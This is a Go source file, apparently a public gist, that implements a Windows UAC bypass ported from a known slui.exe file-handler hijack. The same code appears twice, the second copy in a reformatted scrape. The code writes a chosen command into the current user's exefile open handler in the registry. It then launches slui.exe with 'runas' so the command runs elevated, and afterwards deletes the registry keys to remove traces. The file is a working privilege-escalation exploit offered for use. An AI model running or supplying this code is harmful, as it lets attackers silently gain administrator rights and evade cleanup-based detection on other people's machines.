lesnuages/bypassuac.go

## bypassuac.go
// UAC bypass ported from https://github.com/bytecode77/slui-file-handler-hijack-privilege-escalation/blob/master/SluiFileHandlerHijackLPE/SluiFileHandlerHijackLPE.cpp
package main

import (
	"syscall"
	"time"
	"unsafe"

	"golang.org/x/sys/windows/registry"
)

func createRegistryKey(keyPath string) error {
	_, _, err := registry.CreateKey(registry.CURRENT_USER, keyPath, registry.SET_VALUE|registry.QUERY_VALUE)
	if err != nil {
		return err
	}

	return nil
}

func deleteRegistryKey(keyPath, keyName string) (err error) {
	key, err := registry.OpenKey(registry.CURRENT_USER, keyPath, registry.QUERY_VALUE|registry.SET_VALUE)
	if err != nil {
		return
	}
	err = registry.DeleteKey(key, keyName)
	return
}

func bypassUAC(command string) (err error) {
	regKeyStr := `Software\Classes\exefile\shell\open\command`
	createRegistryKey(regKeyStr)
	key, err := registry.OpenKey(registry.CURRENT_USER, regKeyStr, registry.SET_VALUE|registry.QUERY_VALUE)
	if err != nil {
		return err
	}
	err = key.SetStringValue("", command)
	if err != nil {
		return
	}
	shell32 := syscall.MustLoadDLL("Shell32.dll")
	shellExecuteW := shell32.MustFindProc("ShellExecuteW")
	runasStr, _ := syscall.UTF16PtrFromString("runas")
	sluiStr, _ := syscall.UTF16PtrFromString("C:\\Windows\\System32\\slui.exe")
	r1, _, err := shellExecuteW.Call(uintptr(0), uintptr(unsafe.Pointer(runasStr)), uintptr(unsafe.Pointer(sluiStr)), uintptr(0), uintptr(0), uintptr(1))
	if r1 < 32 {
		return
	}
	// Wait for the command to trigger
	time.Sleep(time.Second * 3)
	// Clean up
	deleteRegistryKey(`Software\Classes\exefile\shell\open\`, "command")
	deleteRegistryKey(`Software\Classes\exefile\shell\`, "open")
	return
}

func main() {
	bypassUAC("c:\\windows\\system32\\cmd.exe")
}
	// UAC bypass ported from https://github.com/bytecode77/slui-file-handler-hijack-privilege-escalation/blob/master/SluiFileHandlerHijackLPE/SluiFileHandlerHijackLPE.cpp
	package main

	import (
	"syscall"
	"time"
	"unsafe"

	"golang.org/x/sys/windows/registry"
	)

	func createRegistryKey(keyPath string) error {
	_, _, err := registry.CreateKey(registry.CURRENT_USER, keyPath, registry.SET_VALUE\|registry.QUERY_VALUE)
	if err != nil {
	return err
	}

	return nil
	}

	func deleteRegistryKey(keyPath, keyName string) (err error) {
	key, err := registry.OpenKey(registry.CURRENT_USER, keyPath, registry.QUERY_VALUE\|registry.SET_VALUE)
	if err != nil {
	return
	}
	err = registry.DeleteKey(key, keyName)
	return
	}

	func bypassUAC(command string) (err error) {
	regKeyStr := `Software\Classes\exefile\shell\open\command`
	createRegistryKey(regKeyStr)
	key, err := registry.OpenKey(registry.CURRENT_USER, regKeyStr, registry.SET_VALUE\|registry.QUERY_VALUE)
	if err != nil {
	return err
	}
	err = key.SetStringValue("", command)
	if err != nil {
	return
	}
	shell32 := syscall.MustLoadDLL("Shell32.dll")
	shellExecuteW := shell32.MustFindProc("ShellExecuteW")
	runasStr, _ := syscall.UTF16PtrFromString("runas")
	sluiStr, _ := syscall.UTF16PtrFromString("C:\\Windows\\System32\\slui.exe")
	r1, _, err := shellExecuteW.Call(uintptr(0), uintptr(unsafe.Pointer(runasStr)), uintptr(unsafe.Pointer(sluiStr)), uintptr(0), uintptr(0), uintptr(1))
	if r1 < 32 {
	return
	}
	// Wait for the command to trigger
	time.Sleep(time.Second * 3)
	// Clean up
	deleteRegistryKey(`Software\Classes\exefile\shell\open\`, "command")
	deleteRegistryKey(`Software\Classes\exefile\shell\`, "open")
	return
	}

	func main() {
	bypassUAC("c:\\windows\\system32\\cmd.exe")
	}